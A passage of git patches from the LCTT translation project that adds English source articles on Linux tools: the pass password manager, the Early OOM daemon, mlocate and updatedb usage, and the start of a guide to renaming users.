epel-release +``` + +On Red Hat Enterprise Linux, however, the package that enables this extra source it's not available; you can download it from the official EPEL site. + +#### Debian and Ubuntu +``` +# apt-get install pass +``` + +#### Arch Linux +``` +# pacman -S pass +``` + +### Initialize the password store + +Once we have `pass` installed, we can begin to use it and configure it. First of all, since pass relies on `gpg` to encrypt our passwords and store it in a secure way, we must have a `gpg keypair` already in place. + +First thing to do is to initialize the `password store`: this is simply the directory where all your gpg-encrypted password will be saved. By default it will be created as a hidden directory inside your `$HOME`, however you can specify an alternative path, by using the `PASSWORD_STORE_DIR` environment variable. Let's proceed: +``` +$ pass init +``` + +The `password-store` directory will be created. Now, let's try to store our first password: +``` +$ pass edit mysite +``` + +At this point an instance of our default text editor will be opened, and all we have to do is to enter our password in it. The file will be encrypted using gpg, and stored as `mysite.gpg` inside the password-store directory. + +Pass stores encrypted files in a directory tree, which means that we can logically group more files in subdirectories to obtain a better organization, we will just have to specify it on file creation, for example: +``` +$ pass edit foo/bar +``` + +Just as above, this will prompt for password insertion, but the file will be created inside the `foo` subdirectory of the password store. To visualize the file structure, all we have to do is to use the `pass` command without any arguments: +``` + +$ pass +Password Store +├── foo +│   └── bar +└── mysite + +``` + +Whenever we need to modify our password, we will just have to repeat the same command used to create it, as shown above. + +### Access the passwords + +There are basically two ways we can access our password: the first one is to display it on the terminal, by using: +``` +pass mysite +``` + +However a better way is to let pass copy it directly to the clipboard, by using the `-c` option: +``` +pass -c mysite +``` + +In this case the clipboard will be cleared after `45` seconds. In both cases, a prompt will appear where you will have to insert your gpg password. + +### Generate passwords + +Pass can also generate (and automatically store) secure passwords for us. Say we want to generate a password composed by 15 characters: alphanumeric and symbols. The command to use will be: +``` +pass generate mysite 15 +``` + +If we want our password to contain only alphanumeric characters we can use the `--no-symbols` option. The generated password will displayed onscreen. Alternatively, it can be copied directly to the clipboard, using the `--clip` or `-c` option. You can even generate a QR code, by using the `-q` or `--qrcode` option: + +![qrcode][1] + +As you can see from the screenshot above, the qrcode has been generated, but since a password for `mysite` already existed at the time we invoked the command, pass showed a prompt to let us confirm that we want to override it. + +Pass uses the `/dev/urandom` device as a (pseudo) random data generator to create the passwords, while it uses the `xclip` utility to copy them to the clipboard, and `qrencode` to display them as qrcodes. This modularity is, in my opinion, its greatest strength: it doesn't reinvent anything, it just wraps common used tools to reach its goal. + +You can also rename, copy or delete files from the password store, respectively using the `pass mv`, `pass cp`, or `pass rm` commands. + +### Using the password store as a git repository + +Another great feature of `pass` is that it can treat the password store as a git repository: letting us manage our password more easily, under a version control system. +``` +pass git init +``` + +This will create the git repository, and automatically create a commit with all the existing files. The next step is to specify the remote repository to track: +``` +pass git remote add +``` + +We can manage this repository just like we do with all other repository we use. The only "difference" is that every time we add or modify a password, `pass` will automatically add the file to the index and create a commit. + +A graphical interface exists for `pass`, it is called `qtpass` and it's available also for Windows and MacOs. It's also possible to access the password store from firefox, using the `PassFF` extension. You will find more detailed informations on the project site. Go on an try `pass`, you will not regret it! + + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/how-to-organize-your-passwords-using-pass-password-manager + +作者:[Egidio Docile][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org +[1]:/images/pass-manager-qrcode.png From 95a81f8b14a7d896ac59b1992dd0cd4c6a400e90 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 16:54:40 +0800 Subject: [PATCH 0860/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Kill?= =?UTF-8?q?=20The=20Largest=20Process=20In=20An=20Unresponsive=20Linux=20S?= =?UTF-8?q?ystem?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Process In An Unresponsive Linux System.md | 136 ++++++++++++++++++ 1 file changed, 136 insertions(+) create mode 100644 sources/tech/20171121 How To Kill The Largest Process In An Unresponsive Linux System.md diff --git a/sources/tech/20171121 How To Kill The Largest Process In An Unresponsive Linux System.md b/sources/tech/20171121 How To Kill The Largest Process In An Unresponsive Linux System.md new file mode 100644 index 0000000000..3f173f2fd2 --- /dev/null +++ b/sources/tech/20171121 How To Kill The Largest Process In An Unresponsive Linux System.md @@ -0,0 +1,136 @@ +How To Kill The Largest Process In An Unresponsive Linux System +====== +I, as a blog writer, have bookmarked many blogs, websites and forums to refer Linux and Unix related notes. Sometimes, I had a lot of open tabs in my browser, so my system goes unresponsive for several minutes. I couldn't move the mouse cursor, or kill a process or close any opened tabs. At that times, I had no choice but to forcibly reset the system. Of course, I use **OneTab** and The **Great Suspender** extensions, but they didn 't help much either. I often ran out of memory. This is where **Early OOM** comes in help. For those wondering, it will kill the largest process in an unresponsive system when it has absolutely no other choices. Early OOM checks the amount of available memory and free swap 10 times a second. If both are below 10%, it will kill the largest process. + +### Why Early OOM? Why not built-in OOM killer? + +Before going into further, let me you give a short explanation of OOM killer, also known as **O** ut **O** f **M** emory killer. OOM killer is a process that the Kernel uses when the system is critically low on memory. The main task of OOM killer is to continue killing processes until enough memory is freed for the smooth functioning of the rest of the process that the Kernel is attempting to run. OOM killer will choose the best processes that are least important to the system and free up maximum memory and kill them. We can view the oom_score of each process in **/proc** directory under **pid** section. + +Example: +``` +$ cat /proc/10299/oom_score +1 +``` + +The higher the value of oom_score of any process, the higher is its likelihood of getting killed by the OOM Killer when the system is running out of memory. + +The developer of Early OOM claims that it has one big advantage over the in-kernel OOM killer. As I stated earlier, the Linux oom killer kills the process with the highest score, so the Chrome browser will always be the first victim of the oom killer. To avoid this, Early OOM uses **/proc/*/status** instead of **echo f > /proc/sysrq-trigger**. He also claims that triggering the oom killer manually may not work at all in latest Linux Kernel. + +### Installing Early OOM + +Early OOM is available in AUR, so you can install it using any AUR helper programs in Arch Linux and its derivatives. + +Using [**Pacaur**][1]: +``` +pacaur -S earlyoom +``` + +Using [**Packer**][2]: +``` +packer -S earlyoom +``` + +Using [**Yaourt**][3]: +``` +yaourt -S earlyoom +``` + +Enable and start Early OOM daemon: +``` +sudo systemctl enable earlyoom +``` +``` +sudo systemctl start earlyoom +``` + +On other Linux distributions, compile and install it manually as shown below. +``` +git clone https://github.com/rfjakob/earlyoom.git +cd earlyoom +make +sudo make install +``` + +### Early OOM - Kill The Largest Process In An Unresponsive Linux System + +Run the following command to start Early OOM: +``` +earlyoom +``` + +If you compiled it from source, run the following command to start Early OOM: +``` +./earlyoom +``` + +The sample output would be: +``` +earlyoom 0.12 +mem total: 3863 MiB, min: 386 MiB (10 %) +swap total: 2047 MiB, min: 204 MiB (10 %) +mem avail: 1770 MiB (45 %), swap free: 2047 MiB (99 %) +mem avail: 1773 MiB (45 %), swap free: 2047 MiB (99 %) +mem avail: 1772 MiB (45 %), swap free: 2047 MiB (99 %) +mem avail: 1773 MiB (45 %), swap free: 2047 MiB (99 %) +mem avail: 1772 MiB (45 %), swap free: 2047 MiB (99 %) +mem avail: 1773 MiB (45 %), swap free: 2047 MiB (99 %) +mem avail: 1771 MiB (45 %), swap free: 2047 MiB (99 %) +mem avail: 1773 MiB (45 %), swap free: 2047 MiB (99 %) +mem avail: 1784 MiB (46 %), swap free: 2047 MiB (99 %) +[...] +``` + +As you see in the above output, Early OOM will display how much memory and swap you have, what the minimum is, how much memory is available and how much swap is free. Remember it will keep running until you manually stop by pressing CTRL+C. + +If both memory and swap reaches below 10%, Early OOM will automatically kill the largest processes until the system has enough memory to run smoothly. You can also configure the minimum percentage value as per your requirement. + +To set available memory minimum to PERCENT of total, run:`` +``` +earlyoom -m +``` + +To set available swap minimum to PERCENT of total, run:`` +``` +earlyoom -s +``` + +For more details, refer the help section. +``` +$ earlyoom -h +earlyoom 0.12 +Usage: earlyoom [OPTION]... + + -m PERCENT set available memory minimum to PERCENT of total (default 10 %) + -s PERCENT set free swap minimum to PERCENT of total (default 10 %) + -M SIZE set available memory minimum to SIZE KiB + -S SIZE set free swap minimum to SIZE KiB + -k use kernel oom killer instead of own user-space implementation + -i user-space oom killer should ignore positive oom_score_adj values + -d enable debugging messages + -v print version information and exit + -r INTERVAL memory report interval in seconds (default 1), set to 0 to + disable completely + -p set niceness of earlyoom to -20 and oom_score_adj to -1000 + -h this help text +``` + +Now, you don't need to worry about highest memory consumption processes. Hope this helps. More good stuffs to come. Stay tuned! + +Cheers! + + + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/kill-largest-process-unresponsive-linux-system/ + +作者:[Aditya Goturu][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com +[1]:https://www.ostechnix.com/install-pacaur-arch-linux/ +[2]:https://www.ostechnix.com/install-packer-arch-linux-2/ +[3]:https://www.ostechnix.com/install-yaourt-arch-linux/ From a77fb64f6326b1edf84e5dfaea5f0079dc984e53 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 16:55:06 +0800 Subject: [PATCH 0861/1627] add done: 20171121 How To Kill The Largest Process In An Unresponsive Linux System.md --- ... Kill The Largest Process In An Unresponsive Linux System.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171121 How To Kill The Largest Process In An Unresponsive Linux System.md b/sources/tech/20171121 How To Kill The Largest Process In An Unresponsive Linux System.md index 3f173f2fd2..8711f170af 100644 --- a/sources/tech/20171121 How To Kill The Largest Process In An Unresponsive Linux System.md +++ b/sources/tech/20171121 How To Kill The Largest Process In An Unresponsive Linux System.md @@ -1,5 +1,7 @@ How To Kill The Largest Process In An Unresponsive Linux System ====== +![](https://www.ostechnix.com/wp-content/uploads/2017/11/Kill-The-Largest-Process-720x340.png) + I, as a blog writer, have bookmarked many blogs, websites and forums to refer Linux and Unix related notes. Sometimes, I had a lot of open tabs in my browser, so my system goes unresponsive for several minutes. I couldn't move the mouse cursor, or kill a process or close any opened tabs. At that times, I had no choice but to forcibly reset the system. Of course, I use **OneTab** and The **Great Suspender** extensions, but they didn 't help much either. I often ran out of memory. This is where **Early OOM** comes in help. For those wondering, it will kill the largest process in an unresponsive system when it has absolutely no other choices. Early OOM checks the amount of available memory and free swap 10 times a second. If both are below 10%, it will kill the largest process. ### Why Early OOM? Why not built-in OOM killer? From 0806f28b4df92a0b28d2a745d0cf86d9c796a74e Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 17:08:02 +0800 Subject: [PATCH 0862/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Finding=20Files?= =?UTF-8?q?=20with=20mlocate:=20Part=203?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...1121 Finding Files with mlocate- Part 3.md | 140 ++++++++++++++++++ 1 file changed, 140 insertions(+) create mode 100644 sources/tech/20171121 Finding Files with mlocate- Part 3.md diff --git a/sources/tech/20171121 Finding Files with mlocate- Part 3.md b/sources/tech/20171121 Finding Files with mlocate- Part 3.md new file mode 100644 index 0000000000..1969514d41 --- /dev/null +++ b/sources/tech/20171121 Finding Files with mlocate- Part 3.md @@ -0,0 +1,140 @@ +Finding Files with mlocate: Part 3 +====== +In the previous articles in this short series, we [introduced the mlocate][1] (or just locate) command, and then discussed some ways [the updatedb tool][2] can be used to help you find that one particular file in a thousand. + +You are probably also aware of xargs as well as the find command. Our trusty friend locate can also play nicely with the --null option of xargs by outputting all of the results onto one line (without spaces which isn't great if you want to read it yourself) by using the -0 switch like this: +``` +# locate -0 .bash +``` + +An option I like to use (if I remember to use it -- because the locate command rarely needs to be queried twice thanks to its simple syntax) is the -e option. +``` +# locate -e .bash +``` + +For the curious, that -e switch means "existing." And, in this case, you can use -e to ensure that any files returned by the locate command do actually exist at the time of the query on your filesystems. + +It's almost magical, that even on a slow machine, the mastery of the modern locate command allows us to query its file database and then check against the actual existence of many files in seemingly no time whatsoever. Let's try a quick test with a file search that's going to return a zillion results and use the time command to see how long it takes both with and without the -e option being enabled. + +I'll choose files with the compressed .gz extension. Starting with a count, you can see there's not quite a zillion but a fair number of files ending in .gz on my machine, note the -c for "count": +``` +# locate -c .gz +7539 +``` + +This time, we'll output the list but time it and see the abbreviated results as follows: +``` +# time locate .gz +real 0m0.091s +user 0m0.025s +sys 0m0.012s +``` + +That's pretty swift, but it's only reading from the overnight-run database. Let's get it to do a check against those 7,539 files, too, to see if they truly exist and haven't been deleted or renamed since last night: +``` +# time locate -e .gz +real 0m0.096s +user 0m0.028s +sys 0m0.055s +``` + +The speed difference is nominal as you can see. There's no point in talking about lightning or blink-and-you-miss-it, because those aren't suitable yardsticks. Relative to the other indexing service I mentioned previously, let's just say that's pretty darned fast. + +If you need to move the efficient database file used by the locate command (in my version it lives here: /var/lib/mlocate/mlocate.db) then that's also easy to do. You may wish to do this, for example, because you've generated a massive database file (it's only 1.1MB in my case so it's really tiny in reality), which needs to be put onto a faster filesystem. + +Incidentally, even the mlocate utility appears to have created an slocate group of users on my machine, so don't be too alarmed if you see something similar, as shown here from a standard file listing: +``` +-rw-r-----. 1 root slocate 1.1M Jan 11 11:11 /var/lib/mlocate/mlocate.db +``` + +Back to the matter in hand. If you want to move away from /var/lib/mlocate as your directory being used by the database then you can use this command syntax (and you'll have to become the "root" user with sudo -i or su - for at least the first command to work correctly): +``` +# updatedb -o /home/chrisbinnie/my_new.db +# locate -d /home/chrisbinnie/my_new.db SEARCH_TERM +``` + +Obviously, replace your database name and path. The SEARCH_TERM element is the fragment of the filename that you're looking for (wildcards and all). + +If you remember I mentioned that you need to run updatedb command as the superuser to reach all the areas of your filesystems. + +This next example should cover two useful scenarios in one. According to the manual, you can also create a "private" database for standard users as follows: +``` +# updatedb -l 0 -o DATABASE -U source_directory +``` + +Here the previously seen -o option means that we output our database to a file (obviously called DATABASE). The -l 0 addition apparently means that the "visibility" of the database file is affected. It means (if I'm reading the docs correctly) that my user can read it but, otherwise, without that option, only the locate command can. + +The second useful scenario for this example is that we can create a little database file specifying exactly which path its top-level should be. Have a look at the database-root or -U source_directory option in our example. If you don't specify a new root file path, then the whole filesystem(s) is scanned instead. + +If you want to get clever and chuck a couple of top-level source directories into one command, then you can manage that having created two separate databases. Very useful for scripting methinks. + +You can achieve that with this command: +``` +# locate -d /home/chrisbinnie/database_one -d /home/chrisbinnie/database_two SEARCH_TERM +``` + +The manual dutifully warns however that ALL users that can read the DATABASE file can also get the complete list of files in the subdirectories of the chosen source_directory. So use these commands with some care. + +### Priced To Sell + +Back to the mind-blowing simplicity of the locate command in use on a day-to-day basis. There are many times when newbies may confused with case-sensitivity on Unix-type systems. Simply use the conventional -i option to ignore case entirely when using the flexible locate command: +``` +# locate -i ChrisBinnie.pdf +``` + +If you have a file structure that has a number of symlinks holding it together, then there might be occasion when you want to remove broken symlinks from the search results. You can do that with this command: +``` +# locate -Le chrisbinnie_111111.xml +``` + +If you needed to limit the search results then you could use this functionality, also in a script for example (similar to the -c option for counting), as so: +``` +# locate -l25 *.gz +``` + +This command simply stops after outputting the first 25 files that were found. When piped through the grep command, it's very useful on a super busy system. + +### Popular Area + +We briefly touched upon performance earlier, and I happened to see this [nicely written blog entry][3], where the author discusses thoughts on the trade-offs between the database size becoming unwieldy and the speed at which results are delivered. + +What piqued my interest are the comments on how the original locate command was written and what limiting factors were considered during its creation. Namely how disk space isn't quite so precious any longer and nor is the delivery of results even when 700,000 files are involved. + +I'm certain that the author(s) of mlocate and its forebears would have something to say in response to that blog post. I suspect that holding onto the file permissions to give us the "secure" and "slocate" functionality in the database might be a fairly big hit in terms of overhead. And, as much as I enjoyed the post, I won't be writing a Bash script to replace mlocate any time soon. I'm more than happy with the locate command and extol its qualities at every opportunity. + +### Sold + +I hope you've acquired enough insight into the superb locate command to prune, tweak, adjust, and tune it to your unique set of requirements. As we've seen, it's fast, convenient, powerful, and efficient. Additionally, you can ignore the "root" user demands and use it within scripts for very specific tasks. + +My favorite aspect, however, is when I'm awakened in the middle of the night because of an emergency. It's not a good look, having to remember the complex find command and typing it slowly with bleary eyes (and managing to add lots of typos): +``` +# find . -type f -name "*.gz" +``` + +Instead of that, I can just use the simple locate command: +``` +# locate *.gz +``` + +As has been said, any fool can create something bigger, bolder, and tougher, but it takes a bit of genius to create something simpler. And, in terms of introducing more people to the venerable Unix-type command line, there's little argument that the locate command welcomes them with open arms. + +Learn more about essential sysadmin skills: Download the [Future Proof Your SysAdmin Career][4] ebook now. + +Chris Binnie's latest book, Linux Server Security: Hack and Defend, shows how hackers launch sophisticated attacks to compromise servers, steal data, and crack complex passwords, so you can learn how to defend against these attacks. In the book, he also talks you through making your servers invisible, performing penetration testing, and mitigating unwelcome attacks. You can find out more about DevSecOps and Linux security via his website ([http://www.devsecops.cc][5]). + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/blog/learn/2017/11/finding-files-mlocate-part-3 + +作者:[][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com +[1]:https://www.linux.com/blog/learn/intro-to-linux/2017/11/finding-files-mlocate +[2]:https://www.linux.com/blog/learn/intro-to-linux/finding-files-mlocate-part-2 +[3]:http://jvns.ca/blog/2015/03/05/how-the-locate-command-works-and-lets-rewrite-it-in-one-minute/ +[4]:https://go.pardot.com/l/6342/2017-07-17/3vwshv?utm_source=linco&utm_medium=blog&utm_campaign=sysadmin&utm_content=promo +[5]:http://www.devsecops.cc/ From 674fa6c0f79f5e81b5e97aaa1a75df59f1b4e6ec Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 17:12:09 +0800 Subject: [PATCH 0863/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Finding=20Files?= =?UTF-8?q?=20with=20mlocate:=20Part=202?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...1114 Finding Files with mlocate- Part 2.md | 171 ++++++++++++++++++ 1 file changed, 171 insertions(+) create mode 100644 sources/tech/20171114 Finding Files with mlocate- Part 2.md diff --git a/sources/tech/20171114 Finding Files with mlocate- Part 2.md b/sources/tech/20171114 Finding Files with mlocate- Part 2.md new file mode 100644 index 0000000000..605ab0acab --- /dev/null +++ b/sources/tech/20171114 Finding Files with mlocate- Part 2.md @@ -0,0 +1,171 @@ +Finding Files with mlocate: Part 2 +====== +[In the previous article][1], we discussed some ways to find a specific file out of the thousands that may be present on your filesystems and introduced the locate tool for the job. Here we explain how the important updatedb tool can help. + +### Well Situated + +Incidentally, you might get a little perplexed if trying to look up the manuals for updatedb and the locate command. Even though it's actually the mlocate command and the binary is /usr/bin/updatedb on my filesystem, you probably want to use varying versions of the following man commands to find what you're looking for: +``` +# man locate + + +# man updatedb + + +# man updatedb.conf + +``` + +Let's look at the important updatedb command in a little more detail now. It's worth mentioning that, after installing the locate utility, you will need to initialize your file-list database before doing anything else. You have to do this as the "root" user in order to reach all the relevant areas of your filesystems or the locate command will complain. Initialize or update your database file, whenever you like, with this command: +``` +# updatedb +``` + +Obviously, the first time this command is run it may take a little while to complete, but when I've installed the locate command afresh I've almost always been pleasantly surprised at how quickly it finishes. After a hop, a skip, and a jump, you can immediately query your file database. However, let's wait a moment before doing that. + +We're dutifully informed by its manual that the database created as a result of running updatedb resides at the following location: /var/lib/mlocate/mlocate.db. + +If you want to change how updatedb is run, then you need to affect it with your config file -- a reminder that it should live here: /etc/updatedb.conf. Listing 1 shows the contents of it on my system: +``` +PRUNE_BIND_MOUNTS = "yes" + +PRUNEFS = "9p afs anon_inodefs auto autofs bdev binfmt_misc cgroup cifs coda configfs +cpuset debugfs devpts ecryptfs exofs fuse fusectl gfs gfs2 hugetlbfs inotifyfs iso9660 +jffs2 lustre mqueue ncpfs nfs nfs4 nfsd pipefs proc ramfs rootfs rpc_pipefs securityfs +selinuxfs sfs sockfs sysfs tmpfs ubifs udf usbfs" + +PRUNENAMES = ".git .hg .svn" + +PRUNEPATHS = "/afs /media /net /sfs /tmp /udev /var/cache/ccache /var/spool/cups +/var/spool/squid /var/tmp" +``` + +Listing 1: The innards of the file /etc/updatedb.conf which affects how our database is created. + +The first thing that my eye is drawn to is the PRUNENAMES section. As you can see by stringing together a list of directory names, delimited with spaces, you can suitably ignore them. One caveat is that only directory names can be skipped, and you can't use wildcards. As we can see, all of the otherwise-hidden files in a Git repository (the .git directory might be an example of putting this option to good use. + +If you need to be more specific then, again using spaces to separate your entries, you can instruct the locate command to ignore certain paths. Imagine for example that you're generating a whole host of temporary files overnight which are only valid for one day. You're aware that this is a special directory of sorts which employs a familiar naming convention for its thousands of files. It would take the locate command a relatively long time to process the subtle changes every night adding unnecessary stress to your system. The solution is of course to simply add it to your faithful "ignore" list. + +### Well Appointed + +As seen in Listing 2, the file /etc/mtab offers not just a list of the more familiar filesystems such as /dev/sda1 but also a number of others that you may not immediately remember. +``` +/dev/sda1 /boot ext4 rw,noexec,nosuid,nodev 0 0 + +proc /proc proc rw 0 0 + +sysfs /sys sysfs rw 0 0 + +devpts /dev/pts devpts rw,gid=5,mode=620 0 0 + +/tmp /var/tmp none rw,noexec,nosuid,nodev,bind 0 0 + +none /proc/sys/fs/binfmt_misc binfmt_misc rw 0 0 +``` + +Listing 2: A mashed up example of the innards of the file /etc/mtab. + +Some of the filesystems shown in Listing 2 contain ephemeral content and indeed content that belongs to pseudo-filesystems, so it is clearly important to ignore their files -- if for no other reason than because of the stress added to your system during each overnight update. + +In Listing 1, the PRUNEFS option takes care of this and ditches those not suitable (for most cases). There are a few different filesystems to consider as you can see: +``` +PRUNEFS = "9p afs anon_inodefs auto autofs bdev binfmt_misc cgroup cifs coda configfs +cpuset debugfs devpts ecryptfs exofs fuse fusectl gfs gfs2 hugetlbfs inotifyfs iso9660 jffs2 +lustre mqueue ncpfs nfs nfs4 nfsd pipefs proc ramfs rootfs rpc_pipefs securityfs selinuxfs +sfs sockfs sysfs tmpfs ubifs udf usbfs" +``` + +The updatedb.conf manual succinctly informs us of the following information in relation to the PRUNE_BIND_MOUNTS option: + +"If PRUNE_BIND_MOUNTS is 1 or yes, bind mounts are not scanned by updatedb(8). All file systems mounted in the subtree of a bind mount are skipped as well, even if they are not bind mounts. As an exception, bind mounts of a directory on itself are not skipped." + +Assuming that makes sense, before moving onto some locate command examples, you should note one thing. Excluding some versions of the updatedb command, it can also be told to ignore certain "non-directory files." However, this does not always apply, so don't blindly copy and paste config between versions if you use such an option. + +### In Need of Modernization + +As mentioned earlier, there are times when finding a specific file needs to be so quick that it's at your fingertips before you've consciously recalled the command. This is the irrefutable beauty of the locate command. + +And, if you've ever sat in front of a horrendously slow Windows machine watching the hard disk light flash manically as if it were suffering a conniption due to the indexing service running, then I can assure you that the performance that you'll receive from the updatedb command will be a welcome relief. + +You should bear in mind, that unlike with the find command, there's no need to remember the base paths of where your file might be residing. By that I mean that all of your (hopefully) relevant filesystems are immediately accessed with one simple command and that remembering paths is almost a thing of the past. + +In its most simple form, the locate command looks like this: +``` +# locate chrisbinnie.pdf +``` + +There's also no need to escape hidden files that start with a dot or indeed expand a search with an asterisk: + +### # locate .bash + +Listing 3 shows us what has been returned, in an instant, from the many partitions the clever locate command has scanned previously. +``` +/etc/bash_completion.d/yum.bash + +/etc/skel/.bash_logout + +/etc/skel/.bash_profile + +/etc/skel/.bashrc + +/home/chrisbinnie/.bash_history + +/home/chrisbinnie/.bash_logout + +/home/chrisbinnie/.bash_profile + +/home/chrisbinnie/.bashrc + +/usr/share/doc/git-1.5.1/contrib/completion/git-completion.bash + +/usr/share/doc/util-linux-ng-2.16.1/getopt-parse.bash + +/usr/share/doc/util-linux-ng-2.16.1/getopt-test.bash +``` + +Listing 3: The search results from running the command: "locate .bash" + +I'm suspicious that the following usage has altered slightly, from back in the day when the slocate command was more popular or possibly the original locate command, but you can receive different results by adding an asterisk to that query as so: +``` +# locate .bash* +``` + +In Listing 4, you can see the difference from Listing 3. Thankfully, the results make more sense now that we can see them together. In this case, the addition of the asterisk is asking the locate command to return files beginning with .bash as opposed to all files containing that string of characters. +``` +/etc/skel/.bash_logout + +/etc/skel/.bash_profile + +/etc/skel/.bashrc + +/home/d609288/.bash_history + +/home/d609288/.bash_logout + +/home/d609288/.bash_profile + +/home/d609288/.bashrc +``` + +Listing 4: The search results from running the command: "locate .bash*" with the addition of an asterisk. + +Stay tuned for next time when we learn more about the amazing simplicity of using the locate command on a day-to-day basis. + +Learn more about essential sysadmin skills: Download the [Future Proof Your SysAdmin Career][2] ebook now. + +Chris Binnie's latest book, Linux Server Security: Hack and Defend, shows how hackers launch sophisticated attacks to compromise servers, steal data, and crack complex passwords, so you can learn how to defend against these attacks. In the book, he also talks you through making your servers invisible, performing penetration testing, and mitigating unwelcome attacks. You can find out more about DevSecOps and Linux security via his website ([http://www.devsecops.cc][3]). + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/blog/learn/intro-to-linux/finding-files-mlocate-part-2 + +作者:[Chris Binnie][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/chrisbinnie +[1]:https://www.linux.com/blog/learn/intro-to-linux/2017/11/finding-files-mlocate +[2]:https://go.pardot.com/l/6342/2017-07-17/3vwshv?utm_source=linco&utm_medium=blog&utm_campaign=sysadmin&utm_content=promo +[3]:http://www.devsecops.cc/ From 523186a5dd6d5567e4fa765c748ce7f7a51b0f84 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 17:12:41 +0800 Subject: [PATCH 0864/1627] add done: 20171114 Finding Files with mlocate- Part 2.md --- sources/tech/20171114 Finding Files with mlocate- Part 2.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/sources/tech/20171114 Finding Files with mlocate- Part 2.md b/sources/tech/20171114 Finding Files with mlocate- Part 2.md index 605ab0acab..19c546a917 100644 --- a/sources/tech/20171114 Finding Files with mlocate- Part 2.md +++ b/sources/tech/20171114 Finding Files with mlocate- Part 2.md @@ -1,5 +1,8 @@ Finding Files with mlocate: Part 2 ====== + +![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/question-mark-locate_0.jpg?itok=JfoE_G5f) + [In the previous article][1], we discussed some ways to find a specific file out of the thousands that may be present on your filesystems and introduced the locate tool for the job. Here we explain how the important updatedb tool can help. ### Well Situated From d94d8b23e84c72df26f0ad0d3b0636d1a2ef2de3 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 17:17:31 +0800 Subject: [PATCH 0865/1627] add done: 20171121 Finding Files with mlocate- Part 3.md --- sources/tech/20171121 Finding Files with mlocate- Part 3.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/sources/tech/20171121 Finding Files with mlocate- Part 3.md b/sources/tech/20171121 Finding Files with mlocate- Part 3.md index 1969514d41..c9eccb2fc7 100644 --- a/sources/tech/20171121 Finding Files with mlocate- Part 3.md +++ b/sources/tech/20171121 Finding Files with mlocate- Part 3.md @@ -1,5 +1,7 @@ Finding Files with mlocate: Part 3 ====== + +![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/question-mark-2492009_1920.jpg?itok=stJ3GxL2) In the previous articles in this short series, we [introduced the mlocate][1] (or just locate) command, and then discussed some ways [the updatedb tool][2] can be used to help you find that one particular file in a thousand. You are probably also aware of xargs as well as the find command. Our trusty friend locate can also play nicely with the --null option of xargs by outputting all of the results onto one line (without spaces which isn't great if you want to read it yourself) by using the -0 switch like this: @@ -126,13 +128,13 @@ Chris Binnie's latest book, Linux Server Security: Hack and Defend, shows how ha via: https://www.linux.com/blog/learn/2017/11/finding-files-mlocate-part-3 -作者:[][a] +作者:[Chris Binnie][a] 译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 -[a]:https://www.linux.com +[a]:https://www.linux.com/users/chrisbinnie [1]:https://www.linux.com/blog/learn/intro-to-linux/2017/11/finding-files-mlocate [2]:https://www.linux.com/blog/learn/intro-to-linux/finding-files-mlocate-part-2 [3]:http://jvns.ca/blog/2015/03/05/how-the-locate-command-works-and-lets-rewrite-it-in-one-minute/ From a3c7c0a86083c9c61da0dc87f8854b701858817f Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 17:19:54 +0800 Subject: [PATCH 0866/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20rena?= =?UTF-8?q?me=20user=20in=20Linux=20(also=20rename=20group=20&=20home=20di?= =?UTF-8?q?rectory)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ux (also rename group - home directory).md | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 sources/tech/20171128 How to rename user in Linux (also rename group - home directory).md diff --git a/sources/tech/20171128 How to rename user in Linux (also rename group - home directory).md b/sources/tech/20171128 How to rename user in Linux (also rename group - home directory).md new file mode 100644 index 0000000000..20ea0ab04b --- /dev/null +++ b/sources/tech/20171128 How to rename user in Linux (also rename group - home directory).md @@ -0,0 +1,65 @@ +How to rename user in Linux (also rename group & home directory) +====== +We might have come across a situation where we might want to rename user in Linux system, for whatever reasons. We can easily rename user in Linux & also 